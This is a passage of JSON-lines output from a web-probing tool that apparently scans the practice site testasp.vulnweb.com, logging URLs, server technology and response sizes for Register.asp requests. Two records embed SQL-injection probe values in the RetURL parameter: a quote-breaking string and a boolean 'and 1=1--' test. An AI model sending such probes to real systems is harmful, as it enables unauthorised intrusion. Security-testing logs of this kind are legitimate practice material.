register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1%29%28%28%29%28%2E%2C%2C%27%22\",\"time\":\"352.645964ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":3691,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:15.24829515Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2\",\"input\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2\",\"title\":\"acuforum register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2\",\"time\":\"351.088381ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":3631,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:24.534617274Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum.asp%3Fid%3D0%2Band%2B1%3D1--%255BTrue%255D\",\"input\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum.asp%3Fid%3D0%2Band%2B1%3D1--%255BTrue%255D\",\"title\":\"acuforum register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp?RetURL=%2Fshowforum.asp%3Fid%3D0%2Band%2B1%3D1--%255BTrue%255D\",\"time\":\"344.934782ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":3699,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:24.549717756Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum.asp%3Fid%3D0\",\"input\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum.asp%3Fid%3D0\",\"title\":\"acuforum register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp?RetURL=%2Fshowforum.asp%3Fid%3D0\",\"time\":\"357.526716ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":3631,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:24.562342745Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum.asp%3Fid%3D2\",\"input\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum.asp%3Fid%3D2\",\"title\":\"acuforum register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp?RetURL=%2Fshowforum.asp%3Fid%3D2\",\"time\":\"346.497067ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":3631,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:24.562765507Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0\",\"input\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0\",\"title\":\"acuforum register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0\",\"time\":\"338.987837ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":3633,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:24.582554937Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10\",\"input\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10\",\"title\":\"acuforum register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10\",\"time\":\"352.32539ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":3635,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:24.583355016Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1\",\"input\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1\",\"title\":\"acuforum register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1\",\"time\":\"352.265424ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":3633,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:24.602477591Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12\",\"input\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12\",\"title\":\"acuforum register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12\",\"time\":\"348.97161ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":3635,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:24.603204654Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13\",\"input\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13\",\"title\":\"acuforum register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13\",\"time\":\"339.625941ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":3635,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:24.607842479Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11\",\"input\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11\",\"title\":\"acuforum register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11\",\"time\":\"363.700121ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":3635,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:24.612324443Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17\",\"input\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17\",\"title\":\"acuforum register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17\",\"time\":\"341.326848ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":3635,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:24.612866488Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14\",\"input\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14\",\"title\":\"acuforum register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14\",\"time\":\"354.96252ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":3635,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:24.613174163Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15\",\"input\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15\",\"title\":\"acuforum register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15\",\"time\":\"348.548628ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":3635,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:24.613186355Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18\",\"input\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18\",\"title\":\"acuforum register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18\",\"time\":\"344.336721ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":3635,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:24.622536757Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19\",\"input\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19\",\"title\":\"acuforum register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19\",\"time\":\"356.417791ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":3635,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:24.628259601Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2\",\"input\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2\",\"title\":\"acuforum register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2\",\"time\":\"361.005488ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":3633,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:24.902653011Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20\",\"input\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20\",\"title\":\"acuforum register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20\",\"time\":\"352.232193ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":3635,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:24.96771644Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21\",\"input\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21\",\"title\":\"acuforum register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21\",\"time\":\"358.269638ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":3635,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:24.977599504Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22\",\"input\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22\",\"title\":\"acuforum register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22\",\"time\":\"340.538392ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":3635,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:25.012497702Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23\",\"input\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23\",\"title\":\"acuforum register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23\",\"time\":\"352.587138ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":3635,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:25.022036847Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24\",\"input\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24\",\"title\":\"acuforum register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24\",\"time\":\"340.745555ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":3635,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:25.147059366Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25\",\"input\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25\",\"title\":\"acuforum register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25\",\"time\":\"350.580858ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":3635,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:25.327444031Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27\",\"input\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27\",\"title\":\"acuforum register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27\",\"time\":\"340.597318ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":3635,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:25.377811269Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28\",\"input\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28\",\"title\":\"acuforum register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28\",\"time\":\"340.568988ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":3635,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:25.391342468Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29\",\"input\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29\",\"title\":\"acuforum register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29\",\"time\":\"352.207381ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":3635,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:25.396944602Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3\",\"input\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3\",\"title\":\"acuforum register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3\",\"time\":\"347.06736ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":3633,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:25.401866466Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31\",\"input\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31\",\"title\":\"acuforum register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31\",\"time\":\"345.248969ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":3635,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:25.403583896Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33\",\"input\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33\",\"title\":\"acuforum register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33\",\"time\":\"343.103529ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":3635,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:25.450046717Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34\",\"input\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34\",\"title\":\"acuforum register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34\",\"time\":\"348.492036ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":3635,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:25.518807425Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35\",\"input\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35\",\"title\":\"acuforum register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35\",\"time\":\"357.204418ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":3635,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:25.606306946Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36\",\"input\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36\",\"title\":\"acuforum register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36\",\"time\":\"346.405141ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":3635,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:34.886250355Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37\",\"input\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37\",\"title\":\"acuforum register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37\",\"time\":\"340.890093ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows 